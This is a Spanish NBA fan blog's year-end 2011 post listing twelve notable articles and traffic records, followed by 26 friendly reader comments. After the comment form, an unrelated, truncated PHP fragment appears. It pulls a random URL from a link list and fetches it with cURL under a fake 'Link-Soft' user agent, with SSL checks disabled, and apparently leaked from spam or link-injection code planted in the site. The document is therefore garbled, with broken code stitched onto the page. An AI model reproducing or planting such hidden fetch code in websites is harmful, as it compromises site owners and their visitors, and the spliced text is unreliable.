2011. Consolidados

31 de December de 2011 por txusma

Un año más, no faltamos a nuestra cita particular. Desde que el blog existe, todos los finales de año (2010, 2009, 2008) hemos querido destacar 12 artículos que por unas razones o por otras han sido importantes durante el año en cuestión y también aprovechamos para reflexionar un poco sobre la situación en que nos encontramos.

Sin duda, este ha sido un año de grandes contrastes y altibajos. Por un lado, hemos disfrutado de uno de los mejores Playoffs de las últimas temporadas con grandes partidos, actuaciones individuales, campeón sorpresa… Todo lo que le podemos pedir a la postemporada. Por el otro, la temporada ha empezado con más de 2 meses de retraso debido al lockout. Pero es curioso. Cuando pensábamos que el lockout vaciaría nuestro blog de seguidores y aficionados, estos se han mantenido fieles e incluso, han acudido en masa en cuanto la temporada ha dado comienzo. Nos encontramos en el mejor momento de nuestro historia (que se inició un 18 de septiembre de 2007 con un análisis de los Milwaukee Bucks). Durante este mes de diciembre ya llevamos más de 39.000 páginas vistas y más de 15.000 visitas, récord absoluto. Desde que abrimos el blog hemos superado el millón de paginas vistas y estamos cerca del medio millón de visitas. A veces sentimos vértigo.

Pero lo que más ilusión nos hace es que nos hemos convertido en un pequeño reducto para debatir y hablar de los que nos apasiona a todos, la NBA. Publicar un artículo y saber que como mínimo, recibirá 10 comentarios y que probablemente pasará de los 30 ayuda mucho. Compensa los minutos (y a veces horas) que dedicamos a la redacción de análisis, artículos y crónicas. Si al otro lado de la pantalla no estuvierais (o si no nos lo hicierais saber) probablemente habríamos abandonado hace meses. Pero aquí estamos y con vuestra ayuda (gracias a todos los que de vez en cuando colaboráis con nosotros) y apoyo, intentaremos quedarnos el máximo tiempo posible.

Y vamos a por los 12 artículos:

– Empezamos no con uno sino con dos: “¿El mejor trade deadline de la historia?” y “Fin de fiesta con fuegos artificiales“. El 24 de febrero de 2011 recibimos 865 visitas, nuestro récord del año. Los traspasos de Carmelo Anthony, Deron Williams, Baron Davis, Kendrick Perkins, Danilo Gallinari, Gerald Wallace y un largo etcétera provocaron el interés de todos los aficionados que acudieron al blog a informarse y, sobre todo, a dar su opinión de lo ocurrido. Meses después aún no nos ponemos de acuerdo en si los New York Knicks salieron ganando en aquel traspaso.

– Pero una cosa son las visitas y otra las páginas vistas. El día de los inocentes, 28 de diciembre, servimos 2.700 páginas, nuestro tope hasta el momento. La noticia de que Pau Gasol volvía a Memphis atrajo la atención de los visitantes que ya se quedaron por el blog disfrutando del resto de contenidos. Por si hay algún despistado en la sala, informamos, por fin, que era una inocentada.

– Y los Mavs se proclamaron campeones de la NBA. Justicia deportiva en todo su esplendor.

– Nos encanta el draft y todo lo que lo rodea. Rumores y traspasos se suceden a velocidades de vértigo y lo mejor es no parpadear demasiado si no quieres perderte algo. Momento mágico de la temporada que nos gusta compartir.

Reflexiones sobre la bocina. No le agradeceremos nunca lo suficiente lo que MagicJohnson32 hace cada cierto tiempo. 7 artículos a cada cual mejor.

– Kareem Abdul-Jabbar, ganchos y gafas, 4º artículo de la serie ‘los mejores pívots de la historia‘ de nuestro colaborador Sergio. Sin duda, los artículos de Sergio han contribuído a aumentar el nivel y la calidad de contenidos del blog. Si queréis repasar la historia de la NBA, no dejéis de releer todo lo que ha publicado.

– ¿Cuáles serán los jugadores franquicia de 2015? Viva_Dirk se atrevía con una mini-lista. La vida va tan rápido que a día de hoy seguro que ya cambiaríamos algún nombre. Si queréis reabrimos el debate.

– A falta de NBA, el Eurobasket de Lituania fue un gran sustitutivo. España se alzó con el oro mostrando un nivel absolutamente envidiable. TheDeerHunter nos lo fue explicando día a día a la vez que destacaba los mejores NBA. Nos quedamos con el último artículo, el de la victoria definitiva.

– En septiembre, cuando estábamos en medio del lockout pero todos pensábamos que se solucionaría y la temporada daría comienzo normalmente, nuestro compañero Jose_Dantley nos enseñó una palabra que semanas después entraría definitivamente en nuestro vocabulario como un elefante en una cacharrería: decertificación. ¿Videncia? No, simplemente uno que sabe.

– Wes Unseld, Richie Guerin, Red Holzman, David Thompson, Kermit Washington… Cuando hay tiempo, yo mismo intento añadir un artículo más a la serie ‘Quien fue…?‘. No reciben muchos comentarios pero seguro que todos descubrimos muchos aspectos nuevos  con ellos. Historia de la NBA explicada a través de sus protagonistas.

– Nos gustan los clásicos, que le vamos a hacer. TheDeerHunter se puso nostálgico y en plan abuelo cebolleta nos explicó sus recuerdos más íntimos relacionados con la NBA en forma de duelos antológicos y partidos históricos. Han sido 5, a cada cual más espectacular, pero seguro que durante el 2012 el número aumenta.

– Y como olvidarse del día que nos levantamos con la noticia que finalmente la NBA daría comienzo en diciembre. No pedimos que sea festivo a partir de ahora porque nos lo pondrían en lunes y no tendría tanta gracia.

BONUS TRACK: La primera crónica de la temporada. Y no hace falta decir nada más.

RE-BONUS TRACK: Me había olvidado de los artículos sobre diseño NBA de Faju. Imperdonable.

¡Feliz año 2012!

Comenta

26 comentarios a esta entrada

  1. simon dice:
    #1

    enhorabuena por todos estos años y espero que sigais mucho tiempo, no suelo comentar por falta de tiempo pero siempre que quiero informarme de la nba,tras la página oficial, este es mi primer sitio de paso. Un placer leeros.

      Citar

  2. Denise dice:
    #2

    enhorabuena chicos!

      Citar

  3. Rompe dice:
    #3

    Enhorabuena a todos los colaboradores, porque es sin duda el mejor blog en español sobre NBA. Yo comento poco porque no estoy al nivel jeje, pero les puedo asegurar que no me pierdo un artículo.
    Feliz año a todos, y a por un 2012 aún mejor!

      Citar

  4. Jose Luis dice:
    #4

    Enhorabuena a todos los miembros de este Blog, de verdad que da gusto leeros todos los días. También enhorabuena a todos los colaboradores y la gente que pasa por aquí a comentar, porque los comentarios son buenísimos también y el nivel de los lectores es alto, con su pizca de humor y fanatismo a veces 😀 me encanta leeros todos los días, así que seguid así siempre! 🙂 ¡Feliz año a todos!

      Citar

  5. Vader dice:
    #5

    Enhorabuena a todos los que trabajais por el blog y feliz 2012!!! 😀

      Citar

  6. Sancho88 dice:
    #6

    Me encanta esta comunidad NBA, y no me cansaré de repetir que el nivel de los comentarios es brutal y el curro que os meteis con las crónicas impresionante. No sé, sobre todo porque aquí todo el mundo tiene la palabra, todo es susceptible de debatirse y te enteras de cualquier cosa de la NBA mucho mejor explicado y mucho antes que en cualquier otro sitio en español. Y el control que teneis del sistema de contratos de una liga tan complicada de explicar por los convenios tan complejos ya me deja filpadísimo. De veras, enhorabuena por el trabajo que estáis haciendo por el basket en clave NBA. Poco a poco se hará el camino, y si se consigue que la gente deje la mierda del fútbol y se vaya pasando cada vez más a la pelotita naranja, en el futuro seguro que echarán más partidos gratis por la tele. La fiebre NBA no para de crecer y vosotros sois garantes de los aficionados febriles, xd. Que somos nosotros. Enhorabuena y ojalá que esto no pare de crecer. FELIZ AÑO!!

      Citar

  7. Blade Petrovic dice:
    #7

    Enorabuena al blog a ver si vuelve el trivial i feliz 2012

      Citar

  8. melo15 dice:
    #8

    Hace un par o tres de meses, que descubri este blog, (estaba buscando informacion de la NBA para un trabajo del cole) y ya me han quitado el movil un par de veces en el cole,porque estoy viciadisimo ha este blog.
    FELIZ AÑO!!

      Citar

  9. The wolf dice:
    #9

    Enhorabuena a todos por este regalo que nos haceis todos los dias…yo al igual que Simon justo despues de abrir la pagina oficial abro el blog para leer ultimos comentarios, nuevos aportes, etc…

    Lo dicho seguid asi y feliz año a todos!

      Citar

  10. busky23 dice:
    #10

    Enhorabuena a todos los que han colaborado en conseguir que blogtjnba se haya convertido en uno de los blogs de referencia del mundo NBA,es un placer leeros,informarse,aprender y debatir de lo q mas nos gusta.
    Mi mas sincera felicitación,nos seguimos leyendo el año que viene,Feliz año a todos.

    I LOVE THIS GAME.

      Citar

  11. SirAlex dice:
    #11

    Felicitaciones! Me encanta el blog, y los leo todos los dias desde Argentna. No suelo comentar porque, como dijo otro lector mas arriba, no me da el nivel. Buen año para todos!

      Citar

  12. Nacho dice:
    #12

    Hace año y medio, o más bien dos, descubrí el enlace que puso Txusma en el blog de Daimiel, hasta ese momento mi único reducto NBA. Me alegra haberos conocido y haber compartido momentos con vosostros. Y espero seguir haciéndolo. Un abrazo a todos los que por aquí moráis y pasáis y feliz año.

      Citar

  13. HisRoyalAirness dice:
    #13

    Creo que me pasó lo mismo que a Nacho, descubrí el blog de manera totalmente fortuíta.

    Sois muy, muy grandes, para mí (y se lo digo a todo el mundo), la mejor página de NBA en español.
    A veces es inverosímil cómo podéis estar ahí a diario y con un trabajo tan fresco y de calidad.
    Mi más sincera enhorabuena por hacer que todos tengamos nuestro reducto para expresarnos y compartir nuestra pasión y que, cada día, nos conozcamos todos un poquito más.

    Feliz año! WE love this game!

      Citar

  14. Denise dice:
    #14

    melo15:
    Hace un par o tres de meses, que descubri este blog, (estaba buscando informacion de la NBA para un trabajo del cole) y ya me han quitado el movil un par de veces en el cole,porque estoy viciadisimo ha este blog.
    FELIZ AÑO!!

    Melo es el “robo” del blog. Que crack!!

      Citar

  15. Toni dice:
    #15

    Tienes razón Txusma, cuando yo descubrí el blog, de igual modo de Nacho por cierto, el número de comentarios oscilaba entre 2 y 8 por jornada, ahora eso no pasa ni en navidades que la gente está más parada, ¡qué auténtica pasada!

    Solo os pido que sigais igual y a poder ser, que Magic se prodigue con más asiduidad con esos artículos estelares. ¡Feliz año cracks!

    PD: Grande Denise, Melo es el auténtico robo del blog jajajaja

      Citar

  16. German dice:
    #16

    Hace poco menos de dos años descubri este blog y desde ese momento no hay dia que no lo visite. La calidad de las notas y de todos los que comentan es espectacular.

    Saludos y muchas felicidades desde Argentina!

      Citar

  17. melo15 dice:
    #17

    Soy el Landry Fields del blog

      Citar

  18. Pop dice:
    #18

    melo15: Soy el Landry Fields del blog

    Si no existieras habría que inventarte. Me has matado con lo del móvil en clase.

    Felicidades a todos los que hacéis este blog, y feliz año a todo el mundo!

      Citar

  19. Blade Petrovic dice:
    #19

    Por cierto melo i yo somos los mejores q elejimos en la hoops yo con meeks i el con brandon roy

      Citar

  20. melo15 dice:
    #20

    Y oden no te olvides

      Citar

  21. Blade Petrovic dice:
    #21

    Se nota q somos rokies (escolares)

      Citar

  22. Blade Petrovic dice:
    #22

    Una cosa me gustaria q como haciais antes pusierais el top ten de la noche en las cronicas sino es mucha faena
    Gracias

      Citar

  23. Txusma dice:
    #23

    Oída la sugerencia!

    Por cierto, en cuanto acabemos con los análisis volveremos con el trivial…

      Citar

  24. Blade Petrovic dice:
    #24

    Gracias si no hay gente para la pregunta la hago yo

      Citar

  25. melo15 dice:
    #25

    Si yo apuesto por la de “Quien se llevara el ROY”

      Citar

  26. Pop dice:
    #26

    melo15: Si yo apuesto por la de “Quien se llevara el ROY”

    xDDDDDDDDDDDDDDDDDDDDDDDDDD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>